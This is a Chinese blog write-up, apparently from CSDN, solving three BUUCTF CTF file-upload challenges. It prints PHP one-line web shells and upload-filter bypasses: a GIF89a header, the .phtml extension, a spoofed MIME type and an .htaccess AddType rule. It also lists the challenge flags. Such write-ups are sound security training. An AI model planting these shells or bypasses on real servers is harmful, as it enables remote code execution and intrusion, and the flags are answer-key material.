BUUCTF - Web - upload三联

最新推荐文章于 2024-05-12 10:53:34 发布
最新推荐文章于 2024-05-12 10:53:34 发布
阅读量1.3k 收藏
点赞数
分类专栏: ctf Writeup 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SuichI314/article/details/121961913
版权

文章目录

[极客大挑战 2019]Upload

一个文件上传的题,先看一眼发现没有前端检测,那就是后端脚本,先随便传个图片马
在这里插入图片描述

操,上传成功了。。。
里面写的是:

GIF89a		//GIF文件头
<script language="php">eval($_REQUEST[8])</script>

这是随便传的以前的图片,以下是正常顺序:
先写个一句话木马传上去:<?php eval($_REQUEST[8])?>,抓包将类型改为:image/jpeg
在这里插入图片描述
看来不光检查了文件的类型,测试发现php[3-5]也不可用(phtml不被过滤),可能是黑名单绕过
尝试传.gif文件,抓包改为.phtml,一句话木马:<?php eval($_REQUEST[8])?>
在这里插入图片描述
看来后端 ban 掉了 <? ,那就写:<script language="php">eval($_REQUEST[8])</script>
在这里插入图片描述
猜测后端存在getimagesize()函数检查文件头,在该文件前面写上:GIF89a
访问一下传上去的图片马
在这里插入图片描述
路径不对,猜测路径为/upload/123.phtml
在这里插入图片描述
上传成功,蚁剑连上在根目录找到flag:flag{baa96266-a311-4b3b-b13f-8605521b6802}

[ACTF2020 新生赛]Upload

看到源码里有句前端检测白名单:var allow_ext = ".jpg|.png|.gif";
上传刚才那张:
在这里插入图片描述
拿到shell
在这里插入图片描述
正常思路来一遍
写个一句话图片木马抓包改后缀:<?php eval($_REQUEST[8])?>
改成phpphp[3-5]均没反应,phtml回显上传成功
flag:flag{8ea3be0a-0b5a-4f5b-8252-1a15502f68cd}

[MRCTF2020]你传你🐎呢

先看源码发现没有前端检测,传一下刚才那张:
在这里插入图片描述
好吧按正常思路来,写个一句话木马改后缀:<?php eval($_REQUEST[8])?>

.jpg文件上传成功,但改成.php不行,尝试兼容文件后缀也不行
看报错信息是说临时创建了目录来保存该12.jpg,既然不能修改后缀,那就传.htaccess
AddType application/x-httpd-php .jpg
在这里插入图片描述
猜测flag在根目录下,直接读:var_dump(file_get_contents('/flag'));
在这里插入图片描述

1ta-chi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
“百度杯”CTF比赛 九月场--web Upload
hanjinrui15的博客
12-30 612
“百度杯”CTF比赛 九月场--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
BUUCTF WEB Upload
qq_41696858的博客
08-30 302
这题和昨天的Upload1简直一模一样,甚至还简单点? 可以看看这一篇https://blog.csdn.net/qq_41696858/article/details/119986051?spm=1001.2014.3001.5501 同样的phtml过后缀过滤,同样的png过前端过滤,同样的蚁剑链接,唯一的区别是<?和图片格式过滤没做 参考视频链接:https://www.bilibili.com/video/BV1kq4y1K7wS ...
BUUCTF Web upload
H18779083518的博客
05-10 322
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
BUUCTF题解_buuctf题目答案(3)
最新发布
2401_84969340的博客
05-12 333
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
ctf-攻防世界-webupload1
一只菜鸟的博客
11-01 479
一个很简单绕过的文件上传 打开靶场,发现一个很简单的上传点。在靶场地址后面加index.php,正常访问无跳转,加index.asp,报错且显示apache容器,看来绝对是php的网站了 burp开启代理,尝试上传php一句话,发现burp没发送请求包就提示文件类型不对,看来是前端验证文件类型。 右键查看源代码,果然是前端验证,只能上传jpg和png。 把写好的一句话后缀改为jpg或png,开启burp,在上传时抓包,将文件后缀改为php,成功绕过上传,并显示...
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 900
1、[极客大挑战 2019]EasySQL
webpack-upload-plugin:Webpack插件
05-13
webpack-upload-plugin介绍这是的插件。 主要目的是提供一个工具,用于将html(或其他语言的模板)中使用的js / css / img / font上传到cdn,然后将引用替换为相应的cdn url。环境要求节点> = 10.5.0安装npm i -D ...
aliyun-upload-sdk-1.5.0.zip
06-09
aliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-...
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
file-upload
02-01
文件上传,jQuery File Upload 是一个Jquery图片上传组件,支持多文件上传、取消、删除,上传前缩略图预览、列表显示图片大小,支持上传进度条显示;支持各种动态语言开发的服务器端。
element-ui 中使用upload多文件上传只请求一次接口
10-16
主要介绍了element-ui 中使用upload多文件上传只请求一次接口,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
BUUCTF WEB writeup(持续更新)
zjnu_y3s的博客
09-24 760
BUUCTF WEB(持续更新) 1、Warmup 打开题目链接,得到一张图片,如下图: 此时先想到看这个网页的源代码,输入source.php即可得到源代码,如下图: 进入php代码审计,粗略看一下可以发现有file,所以我们要想办法得到file,首先先看与file有关的代码块: 看到中间发现需要前面创建的函数,所以我们返回去进行前面代码的审计,在白名单处能看到有两个文件,一个source.php、一个hint.php,我们先打开hint.php,可以看到如下字符: 暂时不知道是干什么用的,
BUUCTFWeb题目 WriteUp
Luminous_song的博客
03-12 5786
Web类题目
BUUCTF平台web writeup
a370793934的专栏
11-28 1464
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
“百度杯”CTF比赛 九月场——Web-Upload
Ifish的博客
05-28 2614
题目描述 解题思路 看到提示,随意上传文件,并且flag在flag.php中,创建赛题,打开链接 就简单上传一个一句话上去 &amp;amp;lt;?php @eval($_POST[&amp;quot;code&amp;quot;]); ?&amp;amp;gt; 结果显示上传成功,但是,发现把“&amp;amp;lt;”和”php ”给过滤掉了 那我们就很自然的想到PHP的长标签了 重新修改代码 &amp;am
BUUCTF-Web】[极客大挑战 2019]Upload
weixin_49298681的博客
01-05 1023
Upload=> 文件上传漏洞。
BUUCTF笔记之Web系列部分WriteUp(四)
克格莫
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
BUUCTF闯关日记--[SUCTF 2019]CheckIn1()
qq_64201116的博客
05-18 259
这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势 进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试 1. 发现.htaccess文件传不了 2. 含有 <? 的文件传不了 首先先解决第一个问题: 一.如果.htaccess文件传不了以我现有的知识只有两个方法: 1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀 2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了 但是现有
buuctf upload-labs-linux
05-21
buuctf upload-labs-linux 是一个基于 Linux 平台的上传漏洞实验室,旨在帮助安全从业人员学习上传漏洞的原理和利用方法。该实验室提供了多个不同难度级别的漏洞场景,用户可以通过上传恶意文件、绕过文件类型限制、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1ta-chi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值